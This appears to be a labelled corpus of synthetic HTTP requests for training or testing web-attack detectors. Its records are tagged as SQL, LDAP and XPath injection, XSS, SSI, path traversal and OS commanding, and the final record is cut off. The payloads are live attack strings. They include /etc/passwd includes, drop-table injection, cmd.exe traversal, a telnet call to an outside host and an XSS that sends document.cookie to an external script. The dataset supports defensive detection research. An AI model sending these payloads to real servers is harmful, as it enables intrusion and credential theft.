GET /eKie/a3YriFXZZoiE/325.zUPn9q5s-/oc7yPH/3COEmLQT0.pl?pnoNGotd=%3C%21--++++%23include+virtual%3D%22%2Fetc%2Fpasswd%22+++--%3E&snohn=06099&Ojktis=2 HTTP/1.1
Host: www.See38lnlu.cz:80
Connection: close
Accept: video/quicktime;q=0.7, application/*;q=0.5
Accept-Charset: gb2312, x-mac-japanese;q=0.7, koi8-r;q=0.4, iso-8859-7;q=0.8, windows-1251
Accept-Encoding: 
Accept-Language: tojtert-svn
Cache-Control: no-transform
Client-ip: 111.208.189.237
Cookie: tyrtZ65s=7;CRJJV42ig=ehem8sinsertxselect$h;sesu=19492;wa=Inhy  fu
Cookie2: $Version="19"
Date: Thu, 30 Sep 04 13:05:27 CET
ETag: W/"KVz0darYpD@iPYSQ"
Expect: tesEzam
From: be1oUn2@8heteu9.de
If-Modified-Since: Wed, 14 Oct 09 12:45:21 GMT
If-Unmodified-Since: Wed, 10 May 06 21:02:53 UTC
If-Match: *
If-None-Match: "Ww7OGdxwNdKHPFGEUbDF"
If-Range: *
Max-Forwards: 83
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ei6idr"
Authorization: Digest algorithm=m2uoga
Range: -25,5895-
Referer: http://www.eotEmlmJ.cz/deiqAa/wiurptt/etyne/ttuvaeKp/wjiarE.php
TE: deflate,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/8.4 (X11; U; Linux i386 6.3; en-fo; rv:0.3.3) Gecko/82099429
UA-CPU: 68000
UA-Disp: 684,759,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 279x705
Via: 2.7 185.9.79.0, 7.5 188.63.24.47
Transfer-Encoding: compress
Warning: 334 www.lstanho.png "Hdnhe0hyyoGe34osiao" "Mon, 03 Nov 08 14:09:43 CET"
X-Serial-Number: 2416806
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35940
Start - Id: 38316
class: LdapInjection
GET /tS/tnDnXLTfUZxetx/evSicM--6KXN85X@/e9tob68eRp0hoEa/QoKa/vPuJi/xnk1k/t1fTWNxYV10aWDBr/EsihtTaoeect.nsf?tznH=2&aee46Riihgytrte=78157561&sSptor=huA8hfHlQOtr&tts4ncoascWtetn=ahceftdet&oaYntr1dotths=a8L&heh05zt=myUCat+tae&ea2o=edsso%29%28++++%7C++++%283y%3D*%29&servicesrHZ=krtO&heodehde=hysat HTTP/1.1
Host: 11.139.5.174
Connection: keep-alive
Accept: video/quicktime, text/*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: clzeaa-pshEi;q=0.9, retBc-nsTu6ni, oj03tTIL-wiee;q=0.2, roatrn-aeae, ia-So;q=0.9
Cache-Control: only-if-cached
Client-ip: 2.55.18.28
Cookie: o1o83CDnnflh=r;ezm= tordeau e\idtds;u4qwVFfAMp=sfo9crno;Ltkh=1394;inFboJwTL=y6antd:js9cu>z
Cookie2: $Version="35"
Date: Sun, 19 Sep 04 10:08:44 UTC
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: 100-continue
From: uiby5mca@ndt1oraj.be
If-Modified-Since: Wed, 21 Apr 10 21:17:29 GMT
If-Unmodified-Since: Sun, 07 Oct 07 15:44:36 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 20 Aug 05 10:12:03 CET
Max-Forwards: 377
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Basic bmVPbmxzOnJ5bGF1
Range: 768701-8
Referer: http://h9utks.cz/nloo/iiei5t/drocdun/Enowmk.asmx
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.8 (X11; U; Open BSD i386 2.0; nb-b8; rv:9.6.9) Gecko/05988518
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: HTTP/7.4 151.224.181.30
Transfer-Encoding: compress
Upgrade: d7t/5.9, eblyng/3.2, 5nhqs/0.7
Warning: 689 170.117.141.73 "aedmi" "Sun, 23 Jul 06 24:48:31 CET"
X-Forwarded-For: 36.43.147.188
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38316
Start - Id: 49054
class: XPathInjection
GET /-bSacceptJhC@passwdxzGiz/awU-c_k3sr/i.M-/eeXPGPCke.Wy8XA44P/ejaeey/jTwvi4do3hvtMendlobo/adFipodJstceny/oatiesgmlts39i/Ie83tjgea/tc4FLqwP0/kn.pwRE3YcQQU@yD2/3xCzBopRl3@l.tiff?TtaGnsgna8whno=aetopaotRtenoe0sr&mtER6g=1b%27%5D+++++%7C+++++P+++++%7C++++%2F%2Fuser%5B++++name%2Ftext%28++%29+++%3D+++%27nfai HTTP/1.0
Host: www.npeoEsoHe.st
Connection: e8nt5wr
Accept: */*;q=0.2
Accept-Charset: iso-8859-5, x-mac-turkish;q=0.7, windows-1251;q=0.4, x-mac-roman, us-ascii
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 20.81.251.104
Cookie: taso42=nN<|D ceed ;Cuc7vBszTn=sFNzw;tnu=6;ktmtshe=r6XikCxKvh;1aednajoEwtpc=nnulla+imgeBlrmsribtsN
Cookie2: $Version="8"
Date: Tue, 09 Dec 08 22:20:39 UTC
ETag: "Rts2dC5s1wzXOEQErdDA"
Expect: P7nlnno=i8ing;eEwjfHro
From: thhe@eis9.be
If-Modified-Since: Mon, 22 Mar 04 20:16:08 GMT
If-Unmodified-Since: Fri, 01 Aug 08 19:14:08 CET
If-Match: "xlFSVSD2iyZ6l003HxqZ"
If-None-Match: *
If-Range: *
Max-Forwards: 15
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Basic cjhhZTp0b2h1bkll
Authorization: Basic Nmd2aDpOZm54aW4=
Range: 15125-,9750-
Referer: /lRhr.mpg
TE: chunked;q=0.9,gzip;q=0.7
Trailer: Referer
User-Agent: Mozilla/2.4 (Machintosh; U; PPC 4.8; ra-dh; rv:1.2.5) Gecko/78742854
UA-CPU: x86
UA-Disp: 357,241,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 003x367
Via: 0ua/4.2 92.4.30.30:9, aiOoh5/5.9 141.75.154.85, 2.0 www.ts4anaa.shtml
Transfer-Encoding: s4nese
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 712 141.86.56.222 "RenNkwhed" "Fri, 05 Oct 07 19:54:02 GMT"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49054
Start - Id: 42056
class: SqlInjection
GET /eGcVlS/hbW0lo_RCuPhut@8.php4?ee2tolt=%27+union+++select++sum%282tombm6%29+++from++++ebvpehi--&rdol=q%40Y&di8=i&jYslFtU2=eko&jokPbtagouh=557034&vicctEo=ch+if HTTP/1.0
Host: www.lAapTaa1a.st
Connection: jpmnoe
Accept: */*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: ue=3ef
Client-ip: 240.50.140.120
Cookie: rgsehrtnl3EaR=375728;yhea=j vls2apshsnullNformc;tnUeN3ednErtN=be.;epiof=8Ae
Cookie2: $Version="46"
Date: Wed, 24 Feb 10 24:19:11 CET
ETag: "zWjqHOL2ecS3XXB"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Sun, 21 Aug 05 19:29:33 UTC
If-Unmodified-Since: Tue, 12 Feb 08 24:31:24 UTC
If-Match: *
If-None-Match: "xiZr1CbvlEVU_BM1mbcR"
If-Range: "w5RYOz85gXktcR8g"
Max-Forwards: 3
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic Y3N0dGR0YTpwZUV0
Authorization: ocsnt noTwatl2=rae2sMHo
Range: -256
Referer: http://lere.ch/icapen/io2eydty.gz
TE: gzip,chunked;q=0.4,trailers
Trailer: Range
User-Agent: nRusREtei/7.6.0
UA-CPU: MIPS
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 927x5675
Via: HTTP/2.5 www.ptEisn.tiff, HTTP/3.3 www.azetiae.js, 2.2 17.149.96.178:21521
Transfer-Encoding: tut2ei; aehnijo=uir4h
Upgrade: Ens/2.7, ieoa/3.9, 4tt/2.8, ind/4.0, sute/1.0
Warning: 264 99.10.30.250 "a0gtsj1ecytcw5Eqrc" 
X-Forwarded-For: 206.224.167.230
X-Serial-Number: 001394948859071824
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42056
Start - Id: 43148
class: OsCommanding
GET /mTZgMu/whereeEnBouH_/kxlmqPrW8zMfK/gp4.QqUeM/i35c/Esiele/rhddfoYVyra/tEhu9yoiswan8ogcad/tgcJV-@fwV8ANKV7-wKP/iTjJ3nyy5IcsRyqXmu7/FaMrI6KTt7.css?aH=%5C%22+++%5C%3B%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+www.chiean.com+++++82809%5C%3B&dzJall51script=tsetc&e0coWTmcene=73532&1ptsnepn=3&lrmclxt=65211156&srgtdNrsr=betmiEtm&kgoRhunihsS=elmzGaRMwwu&be2eRrFa8=tow3+hacdrh%5Bu&mEesHtitwCp=044925&uehtblnterte=1 HTTP/1.0
Host: www.amig.biz:80
Connection: ltisl
Accept: */*;q=0.5
Accept-Charset: cp-932;q=0.0, windows-1250, x-mac-arabic;q=0.0, iso-8859-9
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: Qidmo='dradrj'
Client-ip: 66.158.131.150
Cookie: ZgH15j3d=wOo
Cookie2: $Version="11"
Date: Wed, 06 Dec 06 18:39:18 GMT
ETag: "8Si792-o4C3zcdKh6"
Expect: tvNyv
From: riAeyrh@tgaMea.st
If-Modified-Since: Wed, 27 Oct 04 01:09:11 UTC
If-Unmodified-Since: Fri, 16 Apr 04 06:13:13 CET
If-Match: *
If-None-Match: "mhjSf-DRCZu.Wxk.J5"
If-Range: "Dr1UN7YVdxvt-oIEZ_i"
Max-Forwards: 47
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: cenn vpwg=rlsiiwt
Authorization: Digest algorithm=MD5-sess
Range: 46359-,93372-15,76-
Referer: http://0jcesa.uk/xnmAhaU/4ph8rn3/oaea.doc
TE: deflate,trailers
Trailer: Host
User-Agent: s68i/4.5.8
UA-CPU: Sparc
UA-Disp: 309,0830,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 699x046
Via: 9.4 138.92.104.80:13
Transfer-Encoding: Yoc0us
Upgrade: sPlrA/2.7, nth/6.0, S4hn/1.6, eStqn/4.6, aarg/7.7
Warning: 854 50.62.44.9:3189 "2eaaior" "Sat, 19 Feb 05 12:47:49 UTC"
X-Forwarded-For: 1.132.119.183
X-Serial-Number: 197146981100118
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43148
Start - Id: 41694
class: SqlInjection
GET /m7Rt/.kgp/5wrD.aeWFIfgEJ@V/e0fUK@CwJK.jpeg?ohp1jIis=%27%3B+++++drop++table++yftB6yqneh&eDOrlyHspt=ewb8I&qtcna=7336348&nAnTwsta6at=03339857&e7y6nraat=sIidi HTTP/1.0
Host: 34.188.112.76:80
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: aj-ehd, ih-soat;q=0.5, onrneswi-ah6o;q=0.1
Cache-Control: no-transform
Client-ip: 173.78.32.144
Cookie: hr=soeuoEyen;edimeTs=vbscriptuO
Cookie2: $Version="67"
Date: Thu, 19 Jun 08 20:44:07 GMT
ETag: "ShOwSg3eRa0frjO_pn"
Expect: 100-continue
From: ube8gesO@rdptemmi.st
If-Modified-Since: Sun, 09 Jul 06 02:54:29 CET
If-Unmodified-Since: Sun, 25 Apr 10 23:19:21 GMT
If-Match: *
If-None-Match: *
If-Range: "-i@sj7dVHH6DtS2Vy"
Max-Forwards: 2613
MIME-Version: 5.9
Pragma: bulscla='NtliA'
Proxy-Authorization: Digest opaque="orot6"
Authorization: Basic QXNlbzBuNVM6ZWVyZWJrdHk=
Range: 271923-
Referer: http://www.rssdisn7.org/tuazena0/tuomeS/E1me609e.exe
TE: gzip
Trailer: Authorization
User-Agent: tqeohsM9o (pqB8YID; nRFy.kRttS; nYsP0Zo)
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0003x3071
Via: HTTP/7.0 www.meaeosto.jpg, hho/8.4 www.ssse.htm, FTP/9.8 www.p0iz3.png
Transfer-Encoding: ciwyit
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 200.2.71.249
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41694
Start - Id: 43708
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 167.202.94.102
Connection: keep-alive
Accept: video/mpeg, application/*
Accept-Charset: iso-2022-kr, windows-1251;q=0.9, windows-1255, windows-1252;q=0.7, x-mac-roman
Accept-Encoding: gzip, compress, identity, identity
Accept-Language: oat71lnt-mfSuyFXo
Cache-Control: only-if-cached
Client-ip: 131.122.223.243
Cookie: do=50804;iweyerclfmdooj=3095
Cookie2: $Version="1"
Date: Tue, 24 Aug 04 04:16:17 GMT
ETag: "-4D7Jo4QjAO6o6dlRPcD"
Expect: 100-continue
From: nnlogc@ewfasl3.ch
If-Modified-Since: Tue, 03 Nov 09 10:53:29 GMT
If-Unmodified-Since: Tue, 19 Jul 05 09:48:27 UTC
If-Match: *
If-None-Match: "2sJzH8YrLyPo3VoV"
If-Range: Sat, 22 Apr 06 10:57:09 UTC
Max-Forwards: 13
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: tsoaT mieOyd9e=mWtlue
Authorization: Digest nonce
Range: 7008-71
Referer: /ecjm30Ft/tttnq/nRaer4he/wenbryi.gif
TE: gzip
User-Agent: eactti (uzMNP1)
UA-CPU: 68000
UA-Disp: 911,720,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5641x613
Via: FTP/3.9 50.200.48.127
Transfer-Encoding: tnhrdi; orzia=njLOxln
Upgrade: HweTi/0.0, tten/3.8, hSbn/1.3, sniu/8.5, tfxay/0.5
Warning: 907 www.nh4nvqdc.htm "leoeodrceto" "Thu, 06 Dec 07 08:39:30 UTC"
X-Forwarded-For: 160.206.203.92
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43708
Start - Id: 47625
class: XSS
GET /th/aWiframePIw_Da/nHce/563erb_TP-m8/pCbMNNgGyGsJ8qecho/tYHJeOtHbqx4f.asmx?iereetrbtaxsr=no_PQpyKXE&abixTiM76=43269&SDN=+ni%25&qelsedthml1io=qeOe%5Cedynmrrnia&ihato=oi&be=2&ib5jprocessing-instructionr=%3Cdiv++++style++%3D++%22width%3A+++expression%28%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.niri.com%2Fcgi-bin%2Fst.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B+%22++++%3E&iaaco5os=8 HTTP/1.0
Host: 121.21.163.165
Connection: close
Accept: text/html;q=0.2, text/*, video/quicktime
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: re3r-e;q=0.3, nw-ue0gyy;q=0.9, lest-gnei;q=0.9, ldmIe-rPldadq
Cache-Control: no-cache
Client-ip: 58.158.9.220
Cookie: nhem96d= 6;tmSaa7hsorrac=6131197;e2hdotj1LdSet=o2JS3kK;asngs4sI=d4kperl0;l2=od
Cookie2: $Version="58"
Date: Sat, 24 Jan 04 23:35:48 GMT
ETag: W/"h1nKfSruLg2mDIS"
Expect: 100-continue
From: drEnA@edtwavoDoa.com
If-Modified-Since: Sat, 17 May 08 18:23:49 CET
If-Unmodified-Since: Tue, 12 Jul 05 02:56:30 GMT
If-Match: "WZxAhekJ3qSwjf5"
If-None-Match: *
If-Range: "TpNlc2@.p.bShmWk3j"
Max-Forwards: 294
MIME-Version: 5.8
Pragma: Yi0eeina='xIphsatb'
Proxy-Authorization: Digest cnonce="femknga"
Authorization: NTLM c2xld3poM2ZlYXBkYU9vcm9udG9hd3Bpcnhlc2VycWdJYmF0dGlhc25sYVNk
Range: 545-82205,788-76233
Referer: http://www.nhifdiN.st/ungl/hcolexh1/1tT7r5.asmx
TE: trailers,gzip,trailers
Trailer: Expect
User-Agent: Mozilla/9.9 (X11; U; Open BSD i386 8.8; Ai-ee; rv:1.0.9) Gecko/19206429
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 608x141
Via: 7.2 150.9.181.7:334, ntebs/7.2 201.36.31.28, 3.1 www.st5sthlr.gif
Transfer-Encoding: gzip
Upgrade: eok7ht/3.9, 9eex4/3.3
Warning: 297 www.hzbts.tiff "tresi" "Wed, 25 Apr 07 19:25:41 CET"
X-Forwarded-For: 119.112.244.238
X-Serial-Number: 2524902769036083814
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47625
Start - Id: 39797
class: SSI
GET /atkBpSYR3AFClv/enf3z3cuHA/WMci4IiincludeY5link8G/rqvpvLEaR-Y/g3w/QsndZerifT/cmdE2xvhThqn/qoF9TNppk4lxterm5echo7/iTwbT0s/YK.6.sp/hewa3laeisuued/eEIws-G8J.gif?eE1=%2B&qsene9ls2=%3C%21--++++%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++++--%3E&tlnxnnaaiacmnr=ri HTTP/1.1
Host: 33.177.247.205:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, identity, gzip, deflate;q=0.3, gzip
Accept-Language: *;q=0.7
Cache-Control: min-fresh=5
Client-ip: 252.98.95.119
Cookie: Zi_6binMcAg=432;ehgneeet6=elnetcsnstr-eu
Cookie2: $Version="9"
Date: Thu, 16 Jul 09 12:19:38 CET
ETag: "1MI3X5pRIo3ZW19eTlb1"
Expect: 100-continue
From: otit3le@ijlhneot1o.com
If-Modified-Since: Fri, 24 Sep 04 08:47:10 CET
If-Unmodified-Since: Mon, 02 Jan 06 23:02:24 UTC
If-Match: "bHJKkxda8xbD6vUFfSP"
If-None-Match: *
If-Range: "JZV1muKv98Sl-si9B"
Max-Forwards: 6335
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest nc=Ca5d26eD
Authorization: Digest uri=http://www.wrOk.net/hoodei/i9fdm/hosOp8.rar
Range: 2975-
Referer: /lxLnor/EsnApoe7/rdqse.mdb
TE: trailers,gzip,trailers
Trailer: TE
User-Agent: iwsgeo/7.8.2.4.1
UA-CPU: Sparc
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 468x7869
Via: HTTP/6.3 www.tiCo8.jpg, apsspd/3.6 230.233.79.136, 0.6 99.76.109.82
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
X-Forwarded-For: 197.171.250.97
X-Serial-Number: 39977076241136
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39797
Start - Id: 44020
class: OsCommanding
GET /scripts/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 150.208.6.140
Connection: 7ows6bt
Accept: */*;q=0.7
Accept-Charset: macintosh
Accept-Encoding: gzip, deflate;q=0.8, compress, compress
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 78.141.142.69
Cookie: fMFfevalAmPw=hTLBb
Cookie2: $Version="698"
Date: Fri, 29 Oct 04 17:56:26 GMT
ETag: "afS5RErKT8MdXnD1pWsB"
Expect: 100-continue
From: 44fa@mshrPyo.gov
If-Modified-Since: Tue, 03 Oct 06 01:18:37 UTC
If-Unmodified-Since: Sat, 24 Oct 09 15:50:48 GMT
If-Match: "k3OU0kBy1dz-tyR@"
If-None-Match: "DHlcwtPXjERxITky3"
If-Range: "pIOhWw@_Wr1M5qY"
Max-Forwards: 936
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM aXNEZnNoaXNvYTBkZjFwdG5hc25xY2dBdGN0dGhzNE5ldWluZmxwTw==
Authorization: rpirso 5hnrkEa=t0ebst
Range: 67-764741,470518-20,3-202913
Referer: /nac8ofor/eesdz/ieelLrnr/2otlj.jpeg
TE: gzip;q=0.4,chunked;q=0.9,gzip
Trailer: Host
User-Agent: reod/6.1.6.9.3
UA-CPU: PowerPC
UA-Disp: 675,1960,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5667x180
Via: 7.1 145.91.23.104
Transfer-Encoding: identity
Upgrade: 4nbliA/2.5, eous/5.8, fatd0y/7.3, htsLm/7.0, ejSl/2.7
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44020
Start - Id: 37071
class: LdapInjection
GET /a85/ngmRZ/eUDU7xFreSs_.wz/o5dienIgbfeplcuat/iM/MLZZ/ceel/qGxr/aSjteh5prtr.js?eo5eii8ia4le2m=86552&fbef=2Oaeseti&JBtH-autoexece@dc=%29+%28+++%7C++%28cn%3D*o%27brien*+%29%28mail++++%3D*o++%27brien*+++%29+++&conath3nwnioaha=rmrYsTe%3F%3Aekgi%29opositionttcopy HTTP/1.1
Host: www.brtph.it:5
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.5, compress;q=0.8, deflate;q=0.5, compress
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 206.144.26.20
Cookie: leesi4i3=3
Cookie2: $Version="214"
Date: Thu, 28 Apr 05 21:34:14 CET
ETag: W/"Kzo6hXv1PcdAEDWXUlNO"
Expect: 100-continue
From: eyLj@5eswrLbN.net
If-Modified-Since: Fri, 29 Oct 04 12:37:21 UTC
If-Unmodified-Since: Thu, 18 Sep 08 04:24:04 UTC
If-Match: "Ctj4XsFIpS@7X9GF41"
If-None-Match: "vln_VlCTbsbty1@NgJa"
If-Range: Fri, 06 Aug 04 05:24:49 GMT
Max-Forwards: 18
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM YzBOYW9pYTJpZW1IYWxtb3NXNXNpTThhdGxvb2xyZURudGVpZWV3cHNleGVub3Q=
Authorization: Digest opaque="ihsuh"
Range: -61152
Referer: http://oel7j.de/mrmNE/icsa/iEult.bin
TE: chunked;q=0.2,deflate,gzip;q=0.3
Trailer: If-Match
User-Agent: awks/0.2
UA-CPU: PowerPC
UA-Disp: 538,106,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1905x9959
Via: uaocm/0.7 www.3aece.jpeg, 2.2 194.247.72.38
Transfer-Encoding: compress
Upgrade: dtya/1.7, sefv5/5.8, i5Baoo/5.8
Warning: 233 127.78.233.52 "baru8" "Tue, 09 Mar 04 09:31:50 CET"
X-Forwarded-For: 75.212.179.183
X-Serial-Number: 733012895588
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37071
Start - Id: 38982
class: LdapInjection
GET /feoeen/o7v4/Ff/eGuVD6Z@B9N/cyJ/yF/OzH.g/fe/Oont8rlusw/nhidessu071rcu/toln66/cc2cZtZ_41s.asp?httpsnTunion=11&5od=%3Badminest&N1_sewindow.openXFMn.L=567%29%28%26%28objectClass%3DeZ4r%29%28%7C%28sn+%3D++Zxn%29%28cn%3Dpr+++J*%29%29 HTTP/1.1
Host: 234.39.97.7
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1250, iso-8859-6;q=0.8, x-mac-icelandic, hz-gb-2312;q=0.4
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 157.181.219.121
Cookie: bj=71904683;htditendfartF=28
Cookie2: $Version="51"
Date: Thu, 08 Jan 09 06:29:49 CET
ETag: W/"aTH7ojAKF7GuLTnx"
Expect: 100-continue
From: hen1pimh@E3rhrtw1.uk
If-Modified-Since: Mon, 22 May 06 02:47:52 CET
If-Unmodified-Since: Mon, 10 Apr 06 21:22:54 GMT
If-Match: "-bh6PVfsKGNMKV-"
If-None-Match: "IXcidcWwp_F18ou8yanP"
If-Range: Fri, 11 Feb 05 18:57:49 UTC
Max-Forwards: 69
MIME-Version: 8.0
Pragma: r=datNtrb
Proxy-Authorization: Basic dlliYjpuaXNk
Authorization: Digest cnonce="rtli"
Range: -026476,-042,-27632
Referer: http://Efnb.net/Rittniba/fntko/Rlctn.jsp
TE: trailers,gzip;q=0.7
Trailer: Date
User-Agent: Mozilla/7.0 (Machintosh; U; PPC Mac OS X 3.6; tn-4e; rv:4.5.2) Gecko/11794239
UA-CPU: MIPS
UA-OS: Windows 98
UA-Pixels: 8193x847
Via: 9.7 141.89.250.12
Transfer-Encoding: ouat; nwMsn=ctyo
Upgrade: rsS/8.2, 0dcoT/9.2, sO3bf/3.2, o6e/7.5
Warning: 291 www.9uop.js "voehitwHsNuovsder" "Mon, 25 Jan 10 10:06:46 CET"
X-Serial-Number: 95673
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 38982
Start - Id: 35125
class: SqlInjection
PUT /H45knHB0A7t/synEx/h8izq9vYFNqfZY5Hx2JP/rq@_Y@LWwiqza/prX.FNynrV71Vkwp-/6x@b9gf.dll? HTTP/1.0
Content-Length: 329
Content-Language: qsn2,Foe3rd,i
Content-Encoding: deflate
Content-Location: /soxg/dniO/eehmt/cev1.php
Content-MD5: aXl1b3Nsd2lyYXNhZ2hjdg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 May 06 06:11:05 CET
Last-Modified: Tue, 20 Feb 07 19:13:56 CET
Host: 129.218.179.198
Connection: close
Accept: audio/*;q=0.9, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 86.214.16.25
Cookie: oW4rTnrsAeIrn=3;rnsd4q3=625146102;g5NWr3sou=8henkrr0am;t21t3bsfso=862730;se=ttteui1s6cl
Cookie2: $Version="43"
Date: Mon, 29 Mar 10 03:04:45 CET
ETag: "wECWPXUQhi-PB9N"
Expect: oenfl
If-Modified-Since: Fri, 04 Apr 08 06:59:38 UTC
If-Unmodified-Since: Mon, 28 Jan 08 20:40:25 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 08 Apr 08 12:03:22 CET
Max-Forwards: 47
Pragma: abpoPnnl=rjnonei
Authorization: NTLM bEx0Z2Fod3Rqcmdybm9ubGxhcG9pYUk5YWV0cFpkYWhw
Range: 255878-
Referer: /s3nhre/mkedweem.exe
TE: trailers,trailers,deflate
User-Agent: Mozilla/0.4 (X11; U; Open BSD i386 8.6; gi-tn; rv:1.5.7) Gecko/95044214
UA-Disp: 124,974,8
UA-OS: Win98
UA-Color: color8
Via: HTTP/1.0 www.golaGf.png
Transfer-Encoding: rdtn
Upgrade: masee/8.5, drdmb/5.6, asJ/9.9, oume2Y/4.6, pmsuya/8.2
X-Forwarded-For: 126.226.47.150
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aeitut=2&pra8soodIoHt32='   OR     'Emn0'    BETWEEN    'R'     AND 'T&1ogaecneartGest=es8&Sexetyc2=02694&-window.openx8rHKBBv=9445825&Rko.zHm.nbgsound=D r&0yp0H7htaccesqNVln=9grsho&ahM=debdB&bnrseris8cl9A5l=wrhnhss&24tmheh=7&ae9otoesztu4dE=hi~&edtt2j=osy&.O6mbodyGcA= ilinkaccept&wnao=birqaoSl&ml=?lrre4/cbonis

End - Id: 35125
Start - Id: 36263
class: PathTransversal
PUT /fVOhopenF2CtelnetpGWK/txMelH/tPzhhedReoghRd/ONENV@likePdivl/aZp.js? HTTP/1.0
Content-Length: 558
Content-Language: hnen1ee9,idiwep
Content-Encoding: identity
Content-Location: http://7esoaca.be/anea/HsO9/gsohit/mydeedt.tiff
Content-MD5: ZGlpN3Q1YWJuc0JoeGVoZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 Jan 05 10:33:16 GMT
Last-Modified: Sun, 29 Jun 08 19:50:25 CET
Host: 249.83.112.207
Connection: keep-alive
Accept: image/gif;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: bcRetnlt-eueyexa, D-a;q=0.2, rn-efugilo, i0xma-cht;q=0.2
Cache-Control: max-stale
Client-ip: 112.174.108.236
Cookie: rNopadbwagmeo2t=eIlM;9tginmnP=qK11jFCRb;1irss0ovoik=oeweeunthunOs;KtNQwEJOMRB=6
Cookie2: $Version="90"
Date: Fri, 07 Sep 07 17:46:02 CET
ETag: W/"oOCb5nZctRT5ek672"
Expect: 100-continue
From: tarcw@rtJihd7rad.st
If-Modified-Since: Mon, 11 Jan 10 04:45:38 GMT
If-Unmodified-Since: Mon, 28 Jan 08 19:49:55 GMT
